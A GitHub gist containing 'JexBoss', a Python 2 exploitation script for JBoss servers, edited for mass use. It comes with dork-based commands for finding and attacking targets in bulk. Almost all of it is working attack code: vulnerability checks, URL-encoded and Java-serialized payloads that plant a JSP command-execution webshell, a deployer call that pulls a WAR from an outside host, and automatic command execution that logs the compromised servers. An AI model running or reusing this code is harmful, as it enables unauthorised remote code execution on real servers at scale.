Created
June 19, 2015 03:32
-
-
Save googleinurl/d9940803b101c9ebbf54 to your computer and use it in GitHub Desktop.
JexBoss - Jboss Verify Tool - (MASS) / SCRIPT Edited by: GoogleINURL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
''' | |
-------------------------------------------------------------------------------------- | |
# [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com) | |
# [+] Updates: https://github.com/joaomatosf/jexboss | |
# [+] SCRIPT original: http://1337day.com/exploit/23507 | |
# [+] Free for distribution and modification, but the authorship should be preserved. | |
-------------------------------------------------------------------------------------- | |
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] | |
[+] Modified script-xpl to be used in mass | |
-------------------------------------------------------------------------------------- | |
- # EXPLOIT NAME: JexBoss - Jboss verify and EXploitation Tool - (MASS)/ INURL BRASIL | |
- # Edited by: Cleiton Pinheiro / Nick: googleINURL | |
- # Email: inurlbr@gmail.com | |
- # Blog: http://blog.inurl.com.br | |
- # Twitter: https://twitter.com/googleinurl | |
- # Fanpage: https://fb.com/InurlBrasil | |
- # Pastebin http://pastebin.com/u/Googleinurl | |
- # GIT: https://github.com/googleinurl | |
- # PSS: http://packetstormsecurity.com/user/googleinurl | |
- # YOUTUBE: http://youtube.com/c/INURLBrasil | |
- # PLUS: http://google.com/+INURLBrasil | |
-------------------------------------------------------------------------------------- | |
- # The exploitation vectors are: | |
[+] /jmx-console: tested and working in JBoss versions 4, 5 and 6 | |
[+] /web-console/Invoker: tested and working in JBoss versions 4 | |
[+] /invoker/JMXInvokerServlet: tested and working in JBoss versions 4 and 5 | |
-------------------------------------------------------------------------------------- | |
- # Requirements | |
[+] Python <= 2.7.x | |
-------------------------------------------------------------------------------------- | |
- # Execute: | |
[+] python JexBoss.py http://you_target.us | |
-------------------------------------------------------------------------------------- | |
- # Remote Command Execution: | |
[+] 'uname -a', cat /etc/issue', 'id' | |
-------------------------------------------------------------------------------------- | |
- # Output file: | |
[+] Jbos_vuln.txt | |
-------------------------------------------------------------------------------------- | |
- # Exploit Mass via SCANNER INURLBR / Command | |
- # VIA DORK: | |
[+] php inurlbr.php --dork 'inurl:"jmx-console" "Object Name Filter"' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_" | |
- # VIA FILE TARGET: | |
[+] php inurlbr.php -o 'my_targets.txt' -s output.txt --command-all "python JexBoss.py _TARGET_" | |
- # Download INURLBR: | |
[+] https://github.com/googleinurl/SCANNER-INURLBR | |
-------------------------------------------------------------------------------------- | |
''' | |
import httplib, sys, urllib, os, time | |
from urllib import urlencode | |
RED = '\x1b[91m' | |
RED1 = '\033[31m' | |
BLUE = '\033[94m' | |
GREEN = '\033[32m' | |
BOLD = '\033[1m' | |
NORMAL = '\033[0m' | |
ENDC = '\033[0m' | |
def getHost(url): | |
tokens = url.split("://") | |
if len(tokens) == 2: #foi fornecido protocolo | |
return tokens[1].split(":")[0] | |
else: | |
return tokens.split(":")[0] | |
def getProtocol(url): | |
tokens = url.split("://") | |
if tokens[0] == "https": | |
return "https" | |
else: | |
return "http" | |
def getPort(url): | |
token = url[6:].split(":") | |
if len(token) == 2: | |
return token[1] | |
elif getProtocol(url) == "https": | |
return 443 | |
else: | |
return 80 | |
def getConnection(url): | |
if getProtocol(url) == "https": | |
return httplib.HTTPSConnection(getHost(url), getPort(url), timeout=10) | |
else: | |
return httplib.HTTPConnection(getHost(url), getPort(url), timeout=10) | |
def getSuccessfully(url, path): | |
result = 404 | |
time.sleep(5) | |
conn = getConnection(url) | |
conn.request("GET", path) | |
result = conn.getresponse().status | |
if result == 404: | |
conn.close() | |
time.sleep(7) | |
conn = getConnection(url) | |
conn.request("GET", path) | |
result = conn.getresponse().status | |
conn.close() | |
return result | |
def checkVul(url): | |
print (GREEN + " - Checking Host: %s \t" %url + ENDC) | |
path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", | |
"web-console" : "/web-console/ServerInfo.jsp", | |
"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"} | |
for i in path.keys(): | |
try: | |
print GREEN + " + Checking: %s \t" %i + ENDC, | |
conn = getConnection(url) | |
conn.request("HEAD", path[i]) | |
path[i] = conn.getresponse().status | |
if path[i] == 200 or path[i] == 500: | |
print RED + "[ VULNERABLE ]" + ENDC | |
else: print GREEN + "[ OK ]" | |
conn.close() | |
except: | |
print RED + "\n [ * ] An error ocurred while contaction the host: %s\n" %url + ENDC | |
path[i] = 505 | |
return path | |
def autoExploit(url, type): | |
# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5 | |
# exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6 | |
# exploitWebConsoleInvoker: tested and working in jboss 4 | |
# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5 | |
print GREEN + (" [ + ] Sending exploit code to %s. Wait..." %url) | |
result = 505 | |
if type == "jmx-console": | |
result = exploitJmxConsoleFileRepository(url) | |
if result != 200 and result != 500: | |
result = exploitJmxConsoleMainDeploy(url) | |
elif type == "web-console": | |
result = exploitWebConsoleInvoker(url) | |
elif type == "JMXInvokerServlet": | |
result = exploitJMXInvokerFileRepository(url) | |
if result == 200 or result == 500: | |
print GREEN + " [ + ] Successfully deployed code! Starting command shell, wait..." + ENDC | |
shell_http(url, type) | |
else: | |
print (RED + " [ x ] Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" | |
" [ x ] Waiting for 7 seconds... "+ ENDC) | |
time.sleep(7) | |
def shell_http(url, type): | |
if type == "jmx-console" or type == "web-console": | |
path = '/jbossass/jbossass.jsp?' | |
elif type == "JMXInvokerServlet": | |
path = '/shellinvoker/shellinvoker.jsp?' | |
conn = getConnection(url) | |
conn.request("GET", path) | |
conn.close() | |
time.sleep(7) | |
resp = "" | |
#clear() | |
print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -" | |
print RED+" [ + ] "+url+": \n"+ENDC | |
headers = {"User-Agent" : "jexboss"} | |
for cmd in ['uname -a', 'cat /etc/issue', 'id']: | |
conn = getConnection(url) | |
cmd = urlencode({"ppp": cmd}) | |
conn.request("GET", path+cmd, '', headers) | |
resp += " "+conn.getresponse().read().split(">")[1] | |
print resp, | |
save("\n[ + ] URL=> "+url+"\n[ + ] OUTPUT_SERVER=>\n"+resp); | |
''' | |
while 1: | |
print BLUE + "[Type commands or \"exit\" to finish]" | |
cmd=raw_input("Shell> "+ENDC) | |
#print ENDC | |
if cmd == "exit": | |
break | |
conn = getConnection(url) | |
cmd = urlencode({"ppp": cmd}) | |
conn.request("GET", path+cmd, '', headers) | |
resp = conn.getresponse() | |
if resp.status == 404: | |
print RED+ " * Error contacting the commando shell. Try again later..." | |
conn.close() | |
continue | |
stdout = "" | |
try: | |
stdout = resp.read().split("pre>")[1] | |
except: | |
print RED+ " * Error contacting the commando shell. Try again later..." | |
if stdout.count("An exception occurred processing JSP page") == 1: | |
print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC | |
else: print stdout, | |
conn.close() | |
''' | |
def exploitJmxConsoleMainDeploy(url): | |
# MainDeployer | |
# does not work in jboss5 (bug in jboss5) | |
# shell in link | |
# /jmx-console/HtmlAdaptor | |
jsp = "http://www.joaomatosf.com/rnp/jbossass.war" | |
payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" | |
"=MainDeployer&methodIndex=19&arg0="+jsp) | |
print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell " | |
"\n available on: "+jsp +ENDC) | |
conn = getConnection(url) | |
conn.request("HEAD", payload) | |
result = conn.getresponse().status | |
conn.close() | |
return getSuccessfully(url, "/jbossass/jbossass.jsp") | |
def exploitJmxConsoleFileRepository(url): | |
# DeploymentFileRepository | |
# tested and work in jboss4, 5. | |
# doest not work in jboss6 | |
# shell jsp | |
# /jmx-console/HtmlAdaptor | |
jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61" | |
"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C" | |
"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65" | |
"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20" | |
"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65" | |
"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71" | |
"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72" | |
"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74" | |
"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73" | |
"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29" | |
"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69" | |
"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65" | |
"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29" | |
"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E" | |
"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64" | |
"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70" | |
"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20" | |
"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" ) | |
payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=" | |
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" | |
"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St" | |
"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True") | |
conn = getConnection(url) | |
conn.request("HEAD", payload) | |
result = conn.getresponse().status | |
conn.close() | |
return getSuccessfully(url, "/jbossass/jbossass.jsp") | |
def exploitJMXInvokerFileRepository(url): | |
# tested and work in jboss4, 5 | |
# MainDeploy, shell in data | |
# /invoker/JMXInvokerServlet | |
payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73" | |
"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72" | |
"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f" | |
"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77" | |
"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76" | |
"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2" | |
"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75" | |
"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e" | |
"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00" | |
"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62" | |
"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d" | |
"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc" | |
"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6" | |
"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61" | |
"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90" | |
"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04" | |
"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65" | |
"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f" | |
"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a" | |
"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69" | |
"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c" | |
"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73" | |
"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00" | |
"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61" | |
"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72" | |
"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61" | |
"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e" | |
"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a" | |
"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71" | |
"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65" | |
"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c" | |
"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48" | |
"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e" | |
"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62" | |
"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73" | |
"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65" | |
"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28" | |
"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d" | |
"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61" | |
"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69" | |
"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75" | |
"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70" | |
"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72" | |
"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72" | |
"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65" | |
"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20" | |
"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28" | |
"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69" | |
"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20" | |
"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" | |
"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee" | |
"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72" | |
"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74" | |
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00" | |
"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61" | |
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00" | |
"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65" | |
"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00" | |
"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69" | |
"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61" | |
"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02" | |
"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00" | |
"\x00\x04\x70\x78") | |
conn = getConnection(url) | |
headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue", | |
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"} | |
conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers) | |
response = conn.getresponse() | |
result = response.status | |
if result == 401: | |
print " [ + ] Retrying..." | |
conn.close() | |
conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers) | |
response = conn.getresponse() | |
result = response.status | |
if response.read().count("Failed") > 0: | |
result = 505 | |
conn.close | |
return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp") | |
def exploitWebConsoleInvoker(url): | |
# does not work in jboss5 (bug in jboss5) | |
# MainDeploy, shell in link | |
# /web-console/Invoker | |
#jsp = "http://www.joaomatosf.com/rnp/jbossass.war" | |
#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp) | |
#jsp = "\\x" + jsp | |
payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e" | |
"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65" | |
"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e" | |
"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae" | |
"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61" | |
"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" | |
"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73" | |
"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f" | |
"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75" | |
"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" | |
"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65" | |
"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a" | |
"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f" | |
"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06" | |
"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61" | |
"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58" | |
"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" | |
"\x2a" | |
#link | |
"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61" | |
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f" | |
"\x73\x73\x61\x73\x73\x2e\x77\x61\x72" | |
#end | |
"\x75\x72\x00\x13\x5b" | |
"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e" | |
"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00" | |
"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e" | |
"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e" | |
"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63" | |
"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00" | |
"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65" | |
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65" | |
"\x70\x6c\x6f\x79\x65\x72\x78") | |
conn = getConnection(url) | |
headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation", | |
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"} | |
conn.request("POST", "/web-console/Invoker", payload, headers) | |
response = conn.getresponse() | |
result = response.status | |
if result == 401: | |
print " [ + ] Retrying..." | |
conn.close() | |
conn.request("HEAD", "/web-console/Invoker", payload, headers) | |
response = conn.getresponse() | |
result = response.status | |
conn.close | |
return getSuccessfully(url, "/jbossass/jbossass.jsp") | |
def clear(): | |
if os.name == 'posix': | |
os.system('clear') | |
elif os.name == ('ce', 'nt', 'dos'): | |
os.system('cls') | |
def checkArgs(args): | |
if len(args) < 2 or args[1].count('.') < 1: | |
return 1," [ + ] You must provide the host name or IP address you want to test." | |
elif len(args[1].split('://')) == 1: | |
return 2, ' [ + ] Changing address "%s" to "http://%s"' %(args[1], args[1]) | |
elif args[1].count('http') == 1 and args[1].count('.') > 1: | |
return 0, "" | |
else: | |
return 1, ' [ x ] Parâmetro inválido' | |
def save(url_saved): | |
file_saved = 'Jbos_vuln.txt' | |
msg = GREEN+ "\n [ + ] [FILE SAVED]: "+file_saved | |
if os.path.exists(file_saved): | |
arquivo = open(file_saved, 'a') | |
arquivo.write(url_saved) | |
arquivo.close() | |
print(msg) | |
else: | |
arquivo = open(file_saved, 'w') | |
arquivo.write(url_saved) | |
arquivo.close() | |
print(msg) | |
def banner(): | |
#clear() | |
print (RED + "\n [ + ]@EXPLOIT: JexBoss - Jboss verify and EXploitation Tool"); | |
print (GREEN + " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -"); | |
banner() | |
# check python version | |
if sys.version_info[0] == 3: | |
print (RED + "\n [ ! ] Not compatible with version 3 of python.\n" | |
" Please run it with version 2.7 or lower.\n\n" | |
+BLUE+" [ ! ] Example:\n" | |
" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC ) | |
sys.exit(1) | |
# check Args | |
status, message = checkArgs(sys.argv) | |
if status == 0: | |
url = sys.argv[1] | |
elif status == 1: | |
print RED + "\n [ x ] Error: %s" %message | |
print BLUE + "\n [ ? ] Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC | |
sys.exit(status) | |
elif status == 2: | |
url = ''.join(['http://',sys.argv[1]]) | |
# check vulnerabilities | |
mapResult = checkVul(url) | |
# performs exploitation | |
for i in ["jmx-console", "web-console", "JMXInvokerServlet"]: | |
if mapResult[i] == 200 or mapResult[i] == 500: | |
print BLUE + (" [ * ] Do you want to try to run an automated exploitation via "+BOLD+i+NORMAL) | |
#if raw_input(" yes/NO ? ").lower() == "yes": | |
autoExploit(url, i) | |
# resume results | |
if mapResult.values().count(200) > 0: | |
#banner() | |
print RED+ " [ x ] Results: potentially compromised server!" +ENDC | |
print (GREEN+" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n") | |
elif mapResult.values().count(505) == 0: | |
print ( GREEN+ " [ + ] Results: \n" | |
" [ ! ] The server is not vulnerable to bugs tested ... :D\n\n" + ENDC) | |
# infos | |
print ENDC |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment